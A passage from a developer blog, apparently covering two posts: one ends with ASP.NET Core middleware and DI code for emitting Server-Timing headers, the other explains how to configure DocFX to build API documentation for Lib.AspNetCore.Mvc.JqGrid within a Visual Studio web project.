    public ServerTimingMiddleware(RequestDelegate next)
    {
        _next = next ?? throw new ArgumentNullException(nameof(next));
    }

    public Task Invoke(HttpContext context)
    {
        HandleServerTiming(context);

        return _next(context);
    }

    private void HandleServerTiming(HttpContext context)
    {
        context.Response.OnStarting(() => {
            IServerTiming serverTiming = context.RequestServices.GetRequiredService<IServerTiming>();

            if (serverTiming.Metrics.Count > 0)
            {
                context.Response.SetServerTiming(serverTiming.Metrics.ToArray());
            }

            return _completedTask;
        });
    }
}

Below is the same demo as previously but based on middleware and service. The result is exactly the same, but now the service is accessible through DI which allows for easy gathering of metrics.

public class Startup
{
    public void ConfigureServices(IServiceCollection services)
    {
        services.AddServerTiming();
    }

    public void Configure(IApplicationBuilder app)
    {
        ...

        app.UseServerTiming()
            .Run(async (context) =>
            {
                IServerTiming serverTiming = context.RequestServices
                    .GetRequiredService<IServerTiming>();

                serverTiming.Metrics.Add(new ServerTimingMetric("cache", 300, "Cache"));
                serverTiming.Metrics.Add(new ServerTimingMetric("sql", 900, "Sql Server"));
                serverTiming.Metrics.Add(new ServerTimingMetric("fs", 600, "FileSystem"));
                serverTiming.Metrics.Add(new ServerTimingMetric("cpu", 1230, "Total CPU"));

                await context.Response.WriteAsync("-- Demo.AspNetCore.ServerTiming --");
            });
    }
}

It is important to remember that it is the server who is in full control of which metrics are communicated to the client and when, which may mean that the middleware (or metrics gathering) should be used conditionally.

I've made all the mentioned here classes (and some more) available on GitHub and NuGet ready to use.

I have a couple of small open source projects out there. For me the hardest part of getting such project into state which allows others to use it effectively is creating documentation - I only have enough discipline to put triple-slash-comments on the public API. In the past I've been using Sandcastle Help File Builder to create help files based on that, but it slowly starts to feel heavy and outdate. So when Microsoft announced the move of .NET Framework docs to docs.microsoft.com with information that it is being powered by DocFX I've decided this is what I want to try next time I will have to set up a documentation for a project. Also, based on my previous experience, I've set some requirements:

  • The documentation needs to be part of the Visual Studio solution.
  • The documentation should be generated on build.
  • The documentation should be previewable from Visual Studio.

When Lib.AspNetCore.Mvc.JqGrid reached the v1.0.0 I've got the opportunity to try to achieve this.

Dedicated project for documentation

I wanted to keep the documentation as part of the solution, but at the same time I didn't want it to pollute the existing projects. Creating separated project just for the documentation seemed like a good idea, I just needed to decide on the type of project. DocFx generates the documentation as website so web application project felt natural. It also helped to address the "previewable from Visual Studio" requirement. The built-in preview functionality of DocFx requires going to command line (yes I could try to address that with PostcompileScript target), with web application project all I need is F5 key. I've created an empty ASP.NET Core Web Application and enabled static files support.

public class Startup
{
    ...

    public void Configure(IApplicationBuilder app)
    {
        app.UseDefaultFiles()
            .UseStaticFiles();
    }
}

Setting up DocFx

The DocFx for Visual Studio is available in form of docfx.console package. The moment you install the package it will attempt to generate documentation when project is being build. This means that the build will start crashing because the docfx.json file is missing. After consulting the Doc​FX User Manual I've came up with following file:

{
  "metadata": [
    {
      "src": [
        {
          "files": [
            "Lib.AspNetCore.Mvc.JqGrid.Infrastructure/Lib.AspNetCore.Mvc.JqGrid.Infrastructure.csproj",
            "Lib.AspNetCore.Mvc.JqGrid.Core/Lib.AspNetCore.Mvc.JqGrid.Core.csproj",
            "Lib.AspNetCore.Mvc.JqGrid.DataAnnotations/Lib.AspNetCore.Mvc.JqGrid.DataAnnotations.csproj",
            "Lib.AspNetCore.Mvc.JqGrid.Helper/Lib.AspNetCore.Mvc.JqGrid.Helper.csproj"
          ],
          "exclude": [ "**/bin/**", "**/obj/**" ],
          "src": ".."
        }
      ],
      "dest": "api"
    }
  ],
  "build": {
    "content": [
      {
        "files": [ "api/*.yml" ]
      }
    ],
    "dest": "wwwroot"
  }
}

The metadata section tells DocFx what it should use for generating the API documentation. The src property inside src section allows for setting the base folder for files property, while the files property should point to the projects which will be used for generation. The dest property defines the output folder for generation process. This is not the documentation yet. The actual documentation is being created in the second step which is configured through build section. The content tells DocFx what to use for the website. Here we should point to the output of the previous step and any other documents we want to include. The dest property is where the final website will be available - as this is a context of web application I've targeted wwwroot.

Building the documentation project resulted in disappointment in form of "Cache is not valid" and "No metadata is generated" errors. What's worst the problem was not easy to diagnose as those errors are being reported for a number of different issues. After spending considerable amount of time looking for my specific issue I've stumbled upon DocFx v2.16 release notes which introduced new TargetFramework property for handling projects which are using TargetFrameworks in the csproj. That was exactly my case. The release notes described how to handle complex scenarios (where documentation should be different depending on TargetFramework) but mine was simple, so I just needed to add the property with one of values from csproj.

{
  "metadata": [
    {
      ...
      "properties": {
        "TargetFramework": "netstandard1.6"
      }
    }
  ],
  ...
}

This resulted in successful build and filled up wwwroot/api with HTML files.

Adding minimum static content

The documentation is not quite usable yet. It's missing landing page and top level Table of Contents. The Table of Contents can be handled by adding toc.yml or toc.md to the content, DocFx will render it as the top navigation bar. I've decided to go with markdown option.

# [Introduction](index.md)

# [API Reference](/api/Lib.AspNetCore.Mvc.JqGrid.Helper.html)

As you can guess index.md is the landing page, it should also be added to the content.

{
  ...
  "build": {
    "content": [
      {
        "files": [
          "api/*.yml",
          "index.md",
          "toc.md"
        ]
      }
    ],
    ...
  }
}

Adjusting metadata

The last touch is adjusting some metadata values like title, footer, favicon, logo etc. The favicon and logo require some special handling as they contain paths to resources. In order for resource to be accessible by DocFx it has to be added to dedicated resource section inside build.

{
  ...
  "build": {
    ...
    "resource": [
      {
        "files": [
          "resources/svg/logo.svg",
          "resources/ico/favicon.ico"
        ]
      }
    ],
    ...
    "globalMetadata": {
      "_appTitle": "Lib.AspNetCore.Mvc.JqGrid",
      "_appFooter": "Copyright © 2016 - 2017 Tomasz Pęczek",
      "_appLogoPath": "resources/svg/logo.svg",
      "_appFaviconPath": "resources/ico/favicon.ico",
      "_disableBreadcrumb": true,
      "_disableAffix": true,
      "_disableContribution": true
    }
  }
}

This has satisfied my initial requirements. The further static content can be added exactly the same as index.md has been added, while look and feel can be customized with templates.

Older Posts